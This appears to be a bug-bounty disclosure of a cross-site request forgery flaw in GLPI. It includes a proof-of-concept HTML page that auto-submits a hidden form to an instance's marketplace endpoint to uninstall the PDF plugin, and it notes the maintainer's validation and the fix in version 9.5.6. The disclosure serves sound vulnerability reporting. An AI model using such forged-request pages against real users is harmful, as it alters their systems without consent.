Cross-Site Request Forgery (CSRF) in glpi-project/glpi
Sep 10th 2021
Hello dear glpi team I found one more CSRF vulnerability.
🕵️♂️ Proof of Concept
1.fisrt user already should be logged in In Firefox or safari.
2.Open the PoC.html and click on submit button ( Also it can be auto-submit)
3.Here pdf plugin will be uninstalled after clicking on submit button on PoC.html file.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://nocompany.with7.glpi-network.cloud/ajax/marketplace.php"> <input type="hidden" name="action" value="uninstall_plugin" /> <input type="hidden" name="key" value="pdf" /> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
A glpi-project/glpi maintainer validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
François Legastelois marked this as fixed in 9.5.6 with commit 93750e a year ago
This vulnerability will not receive a CVE
to join this conversation